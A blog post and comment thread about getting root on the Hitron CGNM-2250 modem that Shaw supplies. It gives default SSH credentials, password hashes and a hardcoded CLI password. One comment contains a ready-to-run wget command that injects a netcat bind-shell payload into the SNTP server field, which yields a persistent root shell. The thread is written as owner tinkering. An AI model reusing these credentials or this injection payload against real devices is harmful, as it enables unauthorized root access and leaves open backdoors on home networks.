Edit: This has been fixed in the latest firmare update 4.5.10.25

The routers that you receive from your ISP are almost always garbage: not many options to configure and pitiful wifi range. The router/modem that Shaw customers receive is the Hitron CGNM-2250 thankfully isn't completely terrible, 802.11ac plus gigabit ports. I was poking about and researching the model and came upon an exploit for a similar model version for remote code execution. The CGNM-2250 is vulnerable as well, for reference my software version is 4.5.8.20 with hardware version 1A. The input for the ping utility through the web interface isn't sanitized so you can enter arbitrary input. I discovered that it has a few basic utilities, including Dropbear.

 

From there you can ssh into your router with

ssh mso@192.168.0.1 -p 29

The password is msopassword (go figure!)

You'll be greeted with a fun menu driven interface. 

Most of the menus are for debugging and initial programming purposes. There is a menu option to set the TFTP download image URL to flash the device, so it might be possible to flash your own firmware though I don't know how possible that is.

Going back to the web interface, I was able to see what tools and programs are available on the router.

It is your basic Linux system, busybox plus some manufacturer utilities. For a full list of binaries available see here: https://pasteros.io/573e15ddde8f9 Through digging in the CLI menu I found that /etc/scripts/sys_startup.sh is ran on startup, making it a easier to inject any commands you want to run at startup. I haven't been able to get to a shell yet, since logging in with the 'mso' user it takes you to the CLI menu. But cat /etc/passwd reveals:

root:$1$27272727:0:0::/:/bin/false
nobody:$1$27272727:65535:65535::/:/bin/false
mso:$1$1w7AswO3$IJCko5PwRk6ChJrIYgMQs/:100:100::/:/usr/sbin/cli

One should be able to symlink /bin/sh to /usr/sbin/cli so upon login it would drop to a shell. Entering commands via the web interface is a bit tricky since it doesn't like pipes (|), it's just a matter of getting around the JS validation. Once I can get to a shell I'll write a followup to this post Issue patched in version 4.5.10.25

 

Comments

I found it by searching around the filesystem for strings that appeared in the CLI and following linked libraries. Eventually I came across a library file that had some hints that this was the password. I don't have all the details with me now, but with some more skills/knowledge this could be easily reversed since we have access to all of the files.

The CLI shell is run with restricted user however, so I had to plant a root shell upgrade using the command injection to get full root shell.

I have this router with through Shaw (Canadian ISP) with FW 4.5.10.40, so the webapps exploit no longer works. I need root on the device to set up an ssh server (dropbear I guess would be fine). In your investigations did you find any other ways to get root?

A root shell is possible in firmware 4.5.10.40 through another input validation bug in Administration/Time Setting. You need to sniff network traffic to retrieve the userId cookie and csrf_token, then use wget or curl to set the SNTP server to (for example) "$(nc$IFS-l$IFS-p1337$IFS-e$IFS/bin/sh)". The web interface does not allow special characters, so wget/curl bypasses the client-side checks. Once this is special time server is set you can enable SNTP and you'll be able to connect to port 1337 using netcat on a client machine and get a root shell. The change is persistent through reboots (until Shaw finds out about it), and you can disable it by changing the time setting back to ToD function.

My wget script is:

wget --header="Cookie: userid=$USERID; userName=; password=" -O /dev/stdout http://192.168.0.1/goform/Sntp --post-data="model=%7B%22sntpOnOff%22%3A%22Enabled%22%2C%22sntpTimeZone%22%3A%220%22%2C%22sntpSrvName%22%3A%22%24%28nc%24IFS-l%24IFS-p1337%24IFS-e%24IFS/bin/sh%29%22%2C%22todOnOff%22%3A%22Disabled%22%2C%22todTimeZone%22%3A%220%22%2C%22daylightOnOff%22%3A%22Enabled%22%2C%22daylightTime%22%3A%2260%22%2C%22sntpinfo%22%3A%221%22%2C%22sntpTime%22%3A%22%22%7D&csrf_token=$CSRF"

Set $USERID and $CSRF to what you find from sniffing.

Using this I was able to dump the entire flash. If I recall the password to get out of the cli is found inside libcli_core.so, use strings to find it. In mine this password appears to be: "D0nt4g3tme!"

Could you send me a tutorial on how to get to the root shell. Also do you know what the password for the user "mso" is or where/if I could find it. I have never used wget before. I have 2 of these hitron modems that I got for free and I want to try enabling some of their extra features such as support for multiple SSIDs and the USB ports so I can use them as wifi access points. Any help would be greatly appreciated. I also have one of these hitron modems from shaw which I am using to receive my cable service. I would love to find out how I could get to extra diagnostic menus that would let me read the signal levels, see how many upstream and downstream channels my modem is using, or other stuff.

After some trial and error I was able to run the wget script on 2 of my hitron modems and set the SNTP server to "$(nc$IFS-l$IFS-p1337$IFS-e$IFS/bin/sh)" however now I have no idea how to connect to port 1337 using netcat. I tried running netcat and the furthest I got was to a screen that said "Connection to 192.168.0.1 1337 port [udp/*] succeeded!" when I entered the following command in terminal "nc -v -u 192.168.0.1 1337"

Hi, great info on this thread!. I also have a Hitron 2250 from Shaw. I'm a coder, not much work on hardware. I've been fighting the "worst malware ever" for weeks, tried absolutely everything, even formatting didn't fix it, and then when getting an entirely new laptop *still* didn't fix it! It's invisible to virus scans, McAfee tech support, Shaw...

I dug deeper & found a couple reports of the identical issue - and identical modem. I've put together a db to track the network connections & services (ie, netstat + tasklist) to figure out what's going on. My last step was to add the modem's activity log to cross-check but they don't exist! (or am I blind?)

I assume the log would still be stored though, right? I found a few sites with some starting steps (like https://redd.it/6l5nwg & https://goo.gl/CFHsE1). And I would need Linux, or is the Windows version (with a big warning) a bad idea?!) https://eternallybored.org/misc/netcat/

I've tried literally everything on that stupid modem. The thing is it's the stupidest virus every, it's basically just a timed browser redirect to pages that don't even work. I swear the background task actually watches for what I start deleting things, and it relocates it's important files (and grabs anything missing back off the modem). Honest I'm not crazy! Or else I've been outsmarted by a piece of code. :-(